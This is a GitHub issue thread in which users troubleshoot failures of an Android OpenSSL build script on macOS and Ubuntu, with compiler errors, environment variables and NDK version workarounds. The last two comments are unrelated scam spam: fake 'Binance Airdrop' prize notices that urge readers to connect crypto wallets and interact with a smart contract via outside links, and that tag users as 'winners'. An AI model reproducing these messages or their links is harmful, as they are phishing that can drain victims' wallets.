### ISSUE TITLE
unable to run in OSX

### ISSUE THREAD

**Issue by chiragmewada** [ph4r05/android-openssl#1]
Hi,

Can you please help me to update my openssl for android in OSX

	make depend
making depend in crypto...
../util/domd: line 26: i686-linux-android-gcc: command not found
make[1]: *** [local_depend] Error 1
make: *** [depend] Error 1
making all in crypto...
i686-linux-android-gcc -I. -I.. -I../include  -fPIC -DOPENSSL_PIC -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -mandroid -I/platforms/android-14/arch-x86/usr/include -B/platforms/android-14/arch-x86/usr/lib -O3 -fomit-frame-pointer -Wall -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DRC4_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM   -c -o cryptlib.o cryptlib.c
make[1]: i686-linux-android-gcc: No such file or directory
make[1]: *** [cryptlib.o] Error 1
make: *** [build_crypto] Error 1
cp: lib*.a: No such file or directory
cp: lib*.so: No such file or directory
> DONE for []

**Comment by ph4r05** [comment]
Check out if you have Android NDK configured as required (including ENV vars - ANDROID_NDK). Check also ANDROID_SDK presence. You need Android-14 platform also.

It works for me on Mac OSX. Let me know if you resolved this

**Comment by esutton** [comment]
@ph4r05 Thank you for sharing your work!  I have been trying to build x86 and Arm Android OpenSSl for days now.

Your script would be super amazing if I could  get it to work!

I am getting an error that it cannot find the stdlib?

Do I need to figure out how to modify script to use a standalone toolchain ?
* https://developer.android.com/ndk/guides/standalone_toolchain

````
cryptlib.h:62:21: fatal error: stdlib.h: No such file or directory
````

* macOS 10.13.6

Environment: ~/.profile
````
ANDROID_HOME=$HOME/Library/Android/sdk
ANDROID_SDK_ROOT=$HOME/Library/Android/sdk
ANDROID_NDK=$ANDROID_HOME/ndk-bundle
ANDROID_NDK_HOME=$ANDROID_NDK
ANDROID_NDK_ROOT=$ANDROID_NDK
````

Edited: build.sh
````
# OpenSSL version to download if src is missing
OPENSSL_VERSION="1.0.2j"

# Set acccording to your Android NDK
ANDROID_PLATFORM="android-18"

ANDROID_ARM_TOOLCHAIN="arm-linux-androideabi-4.9"
ANDROID_X86_TOOLCHAIN="x86-4.9"
````

````
generating dummy tests (if needed)...
md2test.c => dummytest.c
rc5test.c => dummytest.c
jpaketest.c => dummytest.c

Configured for android-x86.

*** Because of configuration changes, you MUST do the following before
*** building:

	make depend
making depend in crypto...
In file included from cryptlib.c:117:0:
cryptlib.h:62:21: fatal error: stdlib.h: No such file or directory
 # include <stdlib.h>
                     ^
compilation terminated.
mem.c:59:19: fatal error: stdio.h: No such file or directory
 #include <stdio.h>
                   ^
compilation terminated.
mem_clr.c:60:20: fatal error: string.h: No such file or directory
 #include <string.h>
                    ^
compilation terminated.
o_str.c:60:19: fatal error: ctype.h: No such file or directory
 #include <ctype.h>
                   ^
compilation terminated.
o_dir.c:60:19: fatal error: errno.h: No such file or directory
 #include <errno.h>
                   ^
compilation terminated.
In file included from o_fips.c:59:0:
cryptlib.h:62:21: fatal error: stdlib.h: No such file or directory
 # include <stdlib.h>
                     ^
compilation terminated.
In file included from o_init.c:56:0:
../e_os.h:468:28: fatal error: unistd.h: No such file or directory
 #    include OPENSSL_UNISTD
                            ^
compilation terminated.
make[1]: *** [local_depend] Error 1
make: *** [depend] Error 1
making all in crypto...
i686-linux-android-gcc -I. -I.. -I../include  -fPIC -DOPENSSL_PIC -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -Wa,--noexecstack -mandroid -I/Users/edward3/Library/Android/sdk/ndk-bundle/platforms/android-18/arch-x86/usr/include -B/Users/edward3/Library/Android/sdk/ndk-bundle/platforms/android-18/arch-x86/usr/lib -O3 -fomit-frame-pointer -Wall -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DRC4_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM   -c -o cryptlib.o cryptlib.c
In file included from cryptlib.c:117:0:
cryptlib.h:62:21: fatal error: stdlib.h: No such file or directory
 # include <stdlib.h>
                     ^
compilation terminated.
make[1]: *** [cryptlib.o] Error 1
make: *** [build_crypto] Error 1
cp: lib*.a: No such file or directory
cp: lib*.so: No such file or directory
> DONE for []
````

**Comment by esutton** [comment]
Actually, the first build, the arch-armeabi build succeeds in creating binaries:
````
arch-armeabi
└── lib
    ├── libcrypto.a
    ├── libcrypto.so
    ├── libssl.a
    └── libssl.so
````

It is the arch-armeabi-v7a and x86 builds that fail.

arm7
````
Configured for android-armv7.

*** Because of configuration changes, you MUST do the following before
*** building:

	make depend
making depend in crypto...
In file included from cryptlib.c:117:0:
cryptlib.h:62:21: fatal error: stdlib.h: No such file or directory
 # include <stdlib.h>
                     ^
compilation terminated.
````

x86
````
Configured for android-x86.

*** Because of configuration changes, you MUST do the following before
*** building:

	make depend
making depend in crypto...
In file included from cryptlib.c:117:0:
cryptlib.h:62:21: fatal error: stdlib.h: No such file or directory
 # include <stdlib.h>
                     ^
compilation terminated.
mem.c:59:19: fatal error: stdio.h: No such file or directory
 #include <stdio.h>
````

So something to do with stdlib on arm7 and x86?

````
ANDROID_HOME=/Users/edward3/Library/Android/sdk
ANDROID_SDK_ROOT=/Users/edward3/Library/Android/sdk

ANDROID_NDK=/Users/edward3/Library/Android/sdk/ndk-bundle
ANDROID_NDK_HOME=/Users/edward3/Library/Android/sdk/ndk-bundle
ANDROID_NDK_ROOT=/Users/edward3/Library/Android/sdk/ndk-bundle
````

It looks like stdio.h can be found under ndk-bundle.
````
find $ANDROID_NDK -name 'stdio.h'

/Users/edward3/Library/Android/sdk/ndk-bundle/sources/cxx-stl/gnu-libstdc++/4.9/include/tr1/stdio.h
/Users/edward3/Library/Android/sdk/ndk-bundle/sources/cxx-stl/llvm-libc++/include/stdio.h
/Users/edward3/Library/Android/sdk/ndk-bundle/sources/cxx-stl/stlport/stlport/stdio.h
/Users/edward3/Library/Android/sdk/ndk-bundle/sources/android/support/include/stdio.h
/Users/edward3/Library/Android/sdk/ndk-bundle/sysroot/usr/include/bits/fortify/stdio.h
/Users/edward3/Library/Android/sdk/ndk-bundle/sysroot/usr/include/stdio.h
````

**Comment by esutton** [comment]
Rolling back to ndk-r10e seems to have solved my build problems for macOS !!

I still cannot build on Ubuntu 18.04 using ndk-r10e.  I am OK with that since macOS is my main development host.

Ubuntu build error:
````
i686-linux-android-gcc -I. -I.. -I../include  -fPIC -DOPENSSL_PIC -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -mandroid -I/home/edward3/Android/Sdk/ndk-r10e/platforms/android-14/arch-x86/usr/include -B/home/edward3/Android/Sdk/ndk-r10e/platforms/android-14/arch-x86/usr/lib -O3 -fomit-frame-pointer -Wall -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DRC4_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM   -c -o cryptlib.o cryptlib.c
make[1]: i686-linux-android-gcc: Command not found
<builtin>: recipe for target 'cryptlib.o' failed

````

**Comment by ph4r05** [comment]
Interesting, I've just built it with `android-ndk-r15c`.

I am using macOS primarily, for Ubuntu I would need some PR.

**Comment by esutton** [comment]
@ph4r05 Curious.  Thanks, I will give r15c a try.  

I only setup Ubuntu because I was suspected it could be a clang problem.  I prefer to stay on macOS.

**Comment by ph4r05** [comment]
Hmm it seems there is something broken also with r15c :/

**Comment by esutton** [comment]
Its seemed like newer NDKs could not find stdlib.h or a compiler.
However a find command could find either under the $ANDROID_NDK

Is a stand-alone NDK toolchain required under newer NDKs?

**Comment by gilador** [comment]
Hi, is there any progress with newer NDK versions? say, r20?

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by sneceesay77** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @sjbr, @birkir, @Jennlb, @NEO-XE, @Buratinas, @ndilsou, @hakamaq
